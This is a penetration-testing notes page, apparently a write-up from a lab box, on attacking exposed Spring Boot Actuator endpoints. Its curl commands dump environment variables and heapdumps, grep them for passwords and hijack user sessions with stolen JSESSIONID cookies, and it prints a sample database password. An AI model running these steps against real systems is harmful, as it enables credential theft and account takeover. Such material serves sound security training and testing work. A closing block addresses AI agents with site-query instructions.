> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/things-i-have-pwnd-before/spring-boot-actuators.md). # Spring Boot Actuators Spring Boot Actuators are endpoints that expose operational information about running Spring applications. When misconfigured (exposed without authentication), they can leak sensitive data and enable various attacks. ## Detection ### Whitelabel Error Page When browsing to a non-existent endpoint, Spring Boot displays a generic error: ``` Whitelabel Error Page This application has no explicit mapping for /error, so you are seeing this as a fallback. Thu Jan 22 02:23:23 UTC 2026 There was an unexpected error (type=Not Found, status=404). ``` ### Using Nuclei ```bash nuclei -u http://target.htb/ -rl 75 -c 8 -as # Output showing Spring Boot detection: [spring-detect] [http] [info] http://target.htb/error [springboot-actuator:available-endpoints] [http] [info] http://target.htb/actuator ["health-path","mappings","self","sessions","beans","env","env-toMatch","health"] [springboot-beans] [http] [low] http://target.htb/actuator/beans [springboot-env] [http] [low] http://target.htb/actuator/env [springboot-mappings] [http] [low] http://target.htb/actuator/mappings ``` *** ## Common Actuator Endpoints | Endpoint | Description | Risk | | ------------------------------------------ | ---------------------------------------------- | -------- | | `/actuator` | Lists all available endpoints | Info | | `/actuator/env` | Environment variables, may contain credentials | High | | `/actuator/sessions` | Active sessions with session IDs | Critical | | `/actuator/beans` | All Spring beans in the application | Medium | | `/actuator/mappings` | All @RequestMapping paths | Medium | | `/actuator/health` | Application health status | Low | | `/actuator/heapdump` | JVM heap dump (may contain secrets) | Critical | | `/actuator/logfile` | Application log file | Medium | | `/actuator/trace` or `/actuator/httptrace` | HTTP request traces | High | | `/actuator/shutdown` | Shuts down the application (POST) | Critical | *** ## Enumeration ### List Available Endpoints ```bash curl -s http://target.htb/actuator | jq . ``` Example output: ```json { "_links": { "self": { "href": "http://localhost:8080/actuator", "templated": false }, "sessions": { "href": "http://localhost:8080/actuator/sessions", "templated": false }, "beans": { "href": "http://localhost:8080/actuator/beans", "templated": false }, "health": { "href": "http://localhost:8080/actuator/health", "templated": false }, "env": { "href": "http://localhost:8080/actuator/env", "templated": false }, "mappings": { "href": "http://localhost:8080/actuator/mappings", "templated": false } } } ``` ### Check for Sensitive Endpoints ```bash # Environment variables (may contain DB passwords, API keys) curl -s http://target.htb/actuator/env | jq . # Application routes - useful for finding hidden endpoints curl -s http://target.htb/actuator/mappings | jq . # Active user sessions - goldmine for session hijacking! curl -s http://target.htb/actuator/sessions | jq . # Heap dump - can be analyzed for secrets curl -s http://target.htb/actuator/heapdump -o heapdump.bin ``` *** ## Session Hijacking via /actuator/sessions This is one of the most impactful findings. The sessions endpoint exposes active session IDs and usernames. ### Get Active Sessions ```bash curl -s http://target.htb/actuator/sessions | jq . ``` Example output: ```json { "91E210D5C481E1BEE0D25667612DCF5F": "UNAUTHORIZED", "1E7D6BD497E536CF9FA3DFF861DA4350": "kanderson", "DDC687C0B1996D7E8F289239EED8A7CA": "kanderson" } ``` ### Hijack the Session 1. Copy a valid session ID (e.g., `DDC687C0B1996D7E8F289239EED8A7CA`) 2. Open browser DevTools > Application > Cookies 3. Find the session cookie (often `JSESSIONID` for Spring Boot) 4. Replace the value with the stolen session ID 5. Refresh the page - you're now authenticated as that user! Alternatively, use curl: ```bash curl -s http://target.htb/admin -H "Cookie: JSESSIONID=DDC687C0B1996D7E8F289239EED8A7CA" ``` *** ## Finding Hidden Endpoints via /actuator/mappings The mappings endpoint reveals all application routes, including those not publicly linked. ```bash curl -s http://target.htb/actuator/mappings | jq '.contexts[].mappings.dispatcherServlets[][].predicate' 2>/dev/null ``` Example findings: ```json { "handler": "htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)", "predicate": "{POST [/executessh]}", "details": { "handlerMethod": { "className": "htb.cloudhosting.compliance.ComplianceService", "name": "executeOverSsh", "descriptor": "(Ljava/lang/String;Ljava/lang/String;Ljakarta/servlet/http/HttpServletResponse;)V" } } } ``` This reveals a `/executessh` endpoint that accepts POST requests - potentially vulnerable to command injection! *** ## Extracting Credentials from /actuator/env Environment variables may contain database passwords, API keys, etc.: ```bash curl -s http://target.htb/actuator/env | jq . ``` Look for properties like: * `spring.datasource.password` * `spring.datasource.username` * `spring.datasource.url` * Any property with "password", "secret", "key", "token" Note: Sensitive values are often masked with `******`, but can sometimes be recovered from heapdump. *** ## Heapdump Analysis Download and analyze for credentials: ```bash # Download heapdump curl -s http://target.htb/actuator/heapdump -o heapdump.bin # Use Eclipse Memory Analyzer (MAT) or strings strings heapdump.bin | grep -i password strings heapdump.bin | grep -i secret strings heapdump.bin | grep -i jdbc # Or use heapdump_tool # https://github.com/wyzxxz/heapdump_tool java -jar heapdump_tool.jar heapdump.bin ``` *** ## Extracting Credentials from JAR Files If you gain shell access to a Spring Boot server, check for embedded credentials: ```bash # Find the JAR find / -name "*.jar" 2>/dev/null # Extract and search for credentials unzip -d extracted/ application.jar cat extracted/BOOT-INF/classes/application.properties ``` Example `application.properties`: ```properties spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting spring.datasource.username=postgres spring.datasource.password=Vg&nvzAQ7XxR ``` *** ## References * * --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/spring-boot-actuators.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.